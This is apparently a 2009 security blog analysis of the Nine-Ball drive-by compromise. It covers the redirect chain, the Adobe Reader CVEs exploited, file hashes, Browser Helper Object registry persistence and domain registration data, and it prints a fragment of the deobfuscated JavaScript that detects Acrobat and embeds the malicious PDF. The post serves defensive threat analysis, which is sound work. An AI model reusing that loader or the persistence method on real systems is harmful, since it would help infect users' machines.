Friday, June 19, 2009

Nine-Ball Analysis

On 16 June 2009, Websense released an Alert concerning the latest drive-by web exploit dubbed Nine-Ball. Per Websense, “We have been tracking the Nine-Ball mass compromise since 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that if successful install a trojan downloader on the user's machine.” The name Nine-Ball came from the final landing exploit site destination after a series of redirects: > > >

Further investigation reveals there are numerous landing exploit sites which dynamically change each time a victim host is redirected. Multiple connections from the same source IP address result in a redirect to the benign site The exploit code on the landing site also appears to vary with each site.

The following is sample redirect/exploit path followed from the base redirect

Exploit Analysis
|-->HTTP 302 location redirect to
|---->meta http-equiv refresh redirect to
|------> HTTP 302 location and meta http-equiv refresh redirect to

All of the sites are hosted at (Eurohost LLC, AS48841, Ukraine)

The sites and appear to utilize cookies to track visitor requests. Multiple requests result in a redirect to the landing site

The site returns obfuscated JavaScript that decodes to reveal an EMBED tag that references pdf.php.

function FVEopW91F0QKb(){
var Qqz8W8MiQQlAc = false;
try {
if (navigator.plugins && navigator.mimeTypes.length){
for (var apjVVQ1jEqGNq = 0; apjVVQ1jEqGNq < navigator.plugins.length; apjVVQ1jEqGNq
++ ){
var iWHp9Og8VDFsw = navigator.plugins[apjVVQ1jEqGNq].name;
if (iWHp9Og8VDFsw.indexOf("Adobe Acrobat") != - 1){
Qqz8W8MiQQlAc = true;
break ;
catch (e){
if (Qqz8W8MiQQlAc){
'<EMBED SRC="pdf.php" WIDTH="36" HEIGHT="14" TYPE="application/pdf" /></EMBED>');
else return false;
setTimeout("FVEopW91F0QKb();", 500);

The file pdf.php request returned a PDF file named What_is_Unique_Pack.pdf. The filename refers to the unique Pack exploit toolkit discussed by Finjan.

File: What_is_Unique_Pack.pdf
Size: 15139
MD5: 2C8144C3927A33598FEBFFBFC61B6EA9

The PDF file meta data indicates it was created June 6, 2009 using Nitro PDF Professional 6.0 and print driver BCL easyPDF 6.00.20.

/Creator (NitroPDF 6.0)
/Producer (BCL easyPDF 6.00.20)
/ModDate (D:20090606123256+02'00')
/CreationDate (D:20090606123026+03'00')

The PDF contains obfuscated JavaScript that decodes to reveal 3 exploits targeted against Adobe Reader vulnerabilities.

• Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19)
• Collab.collectEmailInfo()JavaScript Method Remote Code Execution Vulnerability (CVE-2007-5659, APSB08-13)
• Collab.getIcon() JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927, APSB09-04)

All of the exploits result in the GET request for downloaded as load.exe.

Malware Analysis

The malware load.exe creates mscorewr.dll, which Microsoft detects as Win32/Silentbanker.B. As of 2009.06.20 02:30:08 (UTC) only 2/41 antivirus vendors detect the malware.


File: load.exe
Size: 69632
MD5: 801EFE85BEF379E50B882F7B5846DB7A

The malware load.exe creates the following file and registry entries.


File: mscorewr.dll
Size: 86016
MD5: 33C03C3768610765A06CB112CABAA00A

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000} "(Default)"
Type: REG_SZ
Data: mscorewr
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\mscorewr.dll
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\TypeLib "(Default)"
Type: REG_SZ

Domain/IP Analysis

The 3 initial redirect domains,, and resolve to (Eurohost LLC, AS48841, Ukraine). The following domains also currently resolve to

The below table lists domain registration data for the domains hosted at

Domain Registration Provider Registration Date Registrant Country WebCC Ltd. 2009-06-15 RU WebCC Ltd. 2009-05-17 RU WebCC Ltd. 2009-06-03 RU WebCC Ltd. 2009-06-09 RU WebCC Ltd. 2009-06-15 RU WebCC Ltd. 2009-06-12 RU WebCC Ltd. 2009-06-12 RU SKILLTEX 2009-05-18 RU

Redirect testing identified the exploit landing site rotated between several sites. The following sites were observed in addition to the aforementioned Each of the exploit landing sites used different obfuscation techniques, exploits and payload downloads. (, NL) (, US) (, LV) (, CN) (, RU) (, US)

On 22 June 2009, ScanSafe called out Websense's reporting numbers and stated Nine-Ball was a bunch of hype. Let the firewoks begin...

No comments: